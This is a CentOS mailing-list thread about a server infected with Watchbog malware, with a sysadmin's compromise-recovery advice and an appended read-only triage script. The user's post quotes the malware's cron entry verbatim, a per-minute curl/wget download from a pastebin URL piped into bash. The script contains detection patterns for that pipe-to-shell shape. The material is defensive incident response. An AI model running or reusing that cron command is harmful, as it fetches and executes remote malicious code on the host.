On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
<kaushalshriyan@xxxxxxxxx> wrote:
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently I am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps, which is done manually.
1) rm -fr /tmp/*timesyncc.service*
2) crontab -e -u apigee
   delete the cron entry:
   */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3) ps aux | grep watchbog
   kill -9 $(pidof watchbog)
Any suggestions or recommendations to find out how the CentOS 7.5 Linux box got
infected with Watchbog malware? Is there any open source software which can
be installed on a CentOS 7.5 Linux box to detect and prevent malware?
do you have untampered log files?
Standard compromise recovery procedure since forever is (your local
policy may have a slightly different order about notifications and similar):
1. back up all user data
2. Wipe hard drive or whatever storage system you have (some malware
potentially can flash itself in place of the BIOS, but I haven't seen any
really existing one actually do that - experts probably will chime in here)
3. Freshly re-install system, update, configure with all security
precautions in mind, restore users and user data
4. Fresh sshd installation takes care of generating a new server key
pair; just don't copy and re-use the old pair
5. Revoke old SSL certificate(s), and recreate and sign new one(s) -
with new secret key
6. Notify superiors and all users about the compromise; stress that users
have to change their password and key pair(s) on this machine, and
should consider their accounts compromised on machines they connected to
from this machine after the compromise happened. As thorough forensics often
takes longer than two weeks, so you cannot tell right away the exact date
of the original compromise (not the obvious one you see on the surface now),
suggest they change passwords (and key pairs) on machines they ever
connected to from the compromised one. And make them aware that they should
apply it as a chain (to accounts on machines further down the chain of
connections).
To prevent recurrence of the above: update, update, update. Never
install anything that is not coming from a source you trust, anything
that is not downloaded by yourself from a trusted source. Paranoia is in
the sysadmin's job description. Install a host based intrusion detection
system. Do your own research and choose what is suitable for your situation.
I hope this helps.
Valeri
Thanks in Advance.
Best Regards,
Kaushal
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
--
++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247
++++++++++++++++++++++++++++++++++++++++
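A read-only triage script, added here as an example and not written by anyone in the thread, that checks a host for the three indicators Kaushal removed by hand (the download-and-pipe-to-shell cron entry, the /tmp/*timesyncc.service* files, a watchbog process) and reports them without deleting or killing anything, so the evidence is still there when you decide whether to go through the wipe-and-rebuild Valeri describes. The apigee user, the /tmp path and the watchbog process name come from the thread; the script name is assumed.

```shell
#!/bin/sh
# Added triage helper, not from the thread: read-only checks for the
# WatchBog indicators listed above. Reports only; deletes and kills nothing.
# Assumed: /tmp is the drop location and "watchbog" is the process name.
# Run as root on the suspect host:  sh watchbog-triage.sh --run apigee

# Crontab text on stdin -> matching lines on stdout.
# Flags entries that fetch something with curl/wget and pipe it into
# sh or bash, the shape of the entry in Kaushal's step 2.
# Exit 0 if at least one such entry exists, 1 otherwise.
scan_crontab() {
    grep -E '(curl|wget).*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Directory (default /tmp) -> paths of dropper artifacts on stdout,
# hidden files included. Exit 0 if any *timesyncc.service* file exists.
scan_tmp() {
    dir=${1:-/tmp}
    rc=1
    for f in "$dir"/*timesyncc.service* "$dir"/.*timesyncc.service*; do
        [ -e "$f" ] || continue
        printf '%s\n' "$f"
        rc=0
    done
    return $rc
}

# ps output on stdin -> lines mentioning watchbog, minus our own grep.
scan_ps() {
    grep -v grep | grep -i watchbog
}

# Live checks: one user's crontab, /tmp, and the process table.
triage_host() {
    user=${1:-root}
    echo "== pipe-to-shell cron entries for $user =="
    crontab -l -u "$user" 2>/dev/null | scan_crontab || echo "(none found)"
    echo "== timesyncc.service droppers in /tmp =="
    scan_tmp /tmp || echo "(none found)"
    echo "== watchbog processes =="
    ps axo pid,user,args | scan_ps || echo "(none found)"
}

if [ "${1:-}" = "--run" ]; then
    triage_host "${2:-root}"
fi
```

Finding any of the three only tells you the box is compromised, not how it got in; for that you still need the untampered logs Mauricio asks about, ideally copied off the host before anything else is touched.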